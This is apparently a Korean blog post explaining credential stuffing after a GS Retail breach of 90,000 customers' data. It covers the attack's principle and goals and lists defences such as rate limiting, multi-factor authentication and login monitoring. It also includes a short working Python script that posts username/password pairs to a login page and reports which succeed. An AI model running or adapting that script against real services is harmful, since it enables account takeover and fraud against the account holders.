Credential Stuffing 이란

최근에 GS리테일에서 발생한 해킹 이슈

 

'Credential Stuffing'

 

https://news.einfomax.co.kr/news/articleView.html?idxno=4338786

GS리테일, 웹사이트 해킹 공격에 9만명 고객 정보 일부 유출 - 연합인포맥스

 

이걸로 인해 9만명이나 되는 고객 정보가 유출이 되는 사고가 발생했다.

 

 

Credential Stuffing 이 무엇일까?

공격원리 :

자동화된 도구를 사용하여 다양한 웹사이트 및 애플리케이션에 대해 도난당한 로그인 자격 증명(사용자 이름 및 비밀번호 쌍)을 대량으로 테스트하는 일종의 사이버 공격이다. 

 

목표:

신원 도용, 금융 사기, 스팸 발송 등의 사기 행위에 사용될 수 있다.

 

예시:

import requests

# Example credential list (testing purposes only)
credentials = [
    {"username": "test1@example.com", "password": "password123"},
    {"username": "test2@example.com", "password": "letmein123"},
    {"username": "admin@example.com", "password": "admin123"},
]

# Target URL (replace with your testing server)
target_url = "http://example.com/login"

# Loop through credentials and attempt login
for credential in credentials:
    response = requests.post(
        target_url,
        data={
            "username": credential["username"],
            "password": credential["password"]
        }
    )
    
    # Log the result
    if response.status_code == 200 and "Welcome" in response.text:
        print(f"Success: {credential['username']} / {credential['password']}")
    else:
        print(f"Failed: {credential['username']} / {credential['password']}")

 

 

 

대응 방안:

 

기본적으로

1. 웹사이트 속도 제한

2. 다단계 인증

3. 의심스로운 로그인 활동 모니터링

 

고도화로

1. 고도화된 솔루션 도입